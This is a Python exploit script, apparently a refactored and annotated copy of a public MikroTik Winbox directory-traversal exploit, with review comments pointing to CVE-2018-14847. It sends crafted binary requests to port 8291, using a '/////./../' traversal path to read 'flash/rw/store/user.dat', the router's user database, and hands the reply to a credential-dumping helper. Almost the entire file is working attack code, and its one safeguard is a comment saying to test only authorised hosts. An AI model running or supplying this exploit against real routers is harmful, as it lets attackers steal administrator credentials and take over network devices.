#!/usr/bin/env python3

import socket
import sys
from extract_user import dump


# Both requests end in the same 28-byte trailer (a[78:] == b[33:]).
_SHARED_TAIL = bytes.fromhex(
    "0200ff88020000000000080000000100ff8802000200000002000000"
)

# Request 1, 106 bytes.  Per the comment in the main flow this is the "hello";
# its reply is expected to carry a session id at byte 38.  Bytes 25..77 are
# the ASCII path "/////./../" * 3 + "flash/rw/store/user.dat", preceded by
# its length (0x35 = 53): a directory-traversal request for what is, going
# by the file name, the RouterOS user database (NOTE(review): this looks
# like the Winbox traversal usually tracked as CVE-2018-14847 -- confirm
# against the repository README before citing it).  Bytes 0 and 3 (0x68,
# 0x66) equal the message length minus 2 and minus 4, which looks like
# length framing; "M2" at bytes 4..5 is the literal marker.
a = list(
    bytes.fromhex("680100664d320500ff010600ff09050700ff09070100002135")
    + b"/////./../" * 3
    + b"flash/rw/store/user.dat"
    + _SHARED_TAIL
)

# Request 2, 61 bytes.  Byte 19 (0x35 here) is a placeholder that the main
# flow overwrites with the session id from the first reply before sending.
# Bytes 0 and 3 (0x3b, 0x39) follow the same length-minus-2/minus-4 pattern.
b = list(
    bytes.fromhex(
        "3b0100394d320500ff010600ff09060100fe093502000008008000000700ff0904"
    )
    + _SHARED_TAIL
)



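def parse_args(argv: "list[str]") -> "tuple[str, int] | None":
    """Parse ``[script, IP_ADDRESS, [PORT]]`` into ``(ip, port)``.

    Returns ``None`` on a usage error: wrong argument count, a port that is
    not a decimal integer, or a port outside 1..65535 (the original only
    checked ``isdigit``, so e.g. ``70000`` went straight to ``connect``).
    The port defaults to 8291, the Winbox service port.
    """
    if len(argv) not in (2, 3):
        return None
    port = 8291
    if len(argv) == 3:
        # isdecimal() rather than isdigit(): the latter accepts characters
        # such as superscript digits that int() then rejects.
        if not argv[2].isdecimal():
            return None
        port = int(argv[2])
        if not 1 <= port <= 65535:
            return None
    return argv[1], port


def winbox_exchange(ip: str, port: int) -> bytearray:
    """Run the two-message exchange against ``ip:port`` and return the final reply.

    Sends request ``a``, takes byte 38 of the reply (the session id, per the
    original author's comment), writes it into byte 19 of request ``b``,
    sends that and returns the raw second reply.  Each ``recv`` is capped at
    1024 bytes as in the original; a longer reply is truncated and the rest
    is left unread (NOTE(review): the framing is not known from this file,
    so no reassembly is attempted).

    Raises:
        OSError: connect/send/recv failure, including the 3 s timeout
            (``socket.timeout`` is a subclass of ``OSError``).
        ValueError: the first reply is shorter than 39 bytes, so the session
            id offset does not exist -- typically a non-Winbox listener or a
            rejected request.  The original indexed it unconditionally and
            died with an IndexError.
    """
    # create_connection applies the timeout to connect() and leaves it set on
    # the socket; the context manager closes the socket on every exit path
    # (the original never closed it).  sendall() retries partial writes.
    with socket.create_connection((ip, port), timeout=3) as sock:
        sock.sendall(bytes(a))
        hello_reply = bytearray(sock.recv(1024))
        if len(hello_reply) <= 38:
            raise ValueError(
                f"{len(hello_reply)}-byte reply is too short to carry a session id"
            )
        request = bytearray(b)
        request[19] = hello_reply[38]
        sock.sendall(request)
        return bytearray(sock.recv(1024))


def main(argv: "list[str] | None" = None) -> int:
    """Script entry point; returns the process exit status.

    Exit status is 0 when ``dump`` was handed data, 2 on a usage error and 1
    on a connection/protocol failure or an empty result (the original always
    exited 0, which hides failures from any wrapper script).

    The reply is parsed by ``extract_user.dump`` and is fully controlled by
    the remote host, so treat that parser as handling untrusted input.  Only
    run this against hosts you are authorised to test.
    """
    parsed = parse_args(sys.argv if argv is None else argv)
    if parsed is None:
        print("Usage: python3 WinboxExploit.py IP_ADDRESS [PORT]")
        return 2
    ip, port = parsed

    try:
        reply = winbox_exchange(ip, port)
    except OSError as e:
        print("Connection error: " + str(e))
        return 1
    except ValueError as e:
        print("Protocol error: " + str(e))
        return 1

    print("Connected to " + ip + ":" + str(port))
    payload = reply[55:]
    # The 55-byte offset and 25-byte threshold are inherited from the
    # original; presumably they skip the reply header and reject an
    # empty/error reply -- not verified against a protocol description.
    if len(payload) > 25:
        print("Exploit successful")
        dump(payload)
        return 0
    print("Exploit failed")
    return 1


if __name__ == "__main__":
    sys.exit(main())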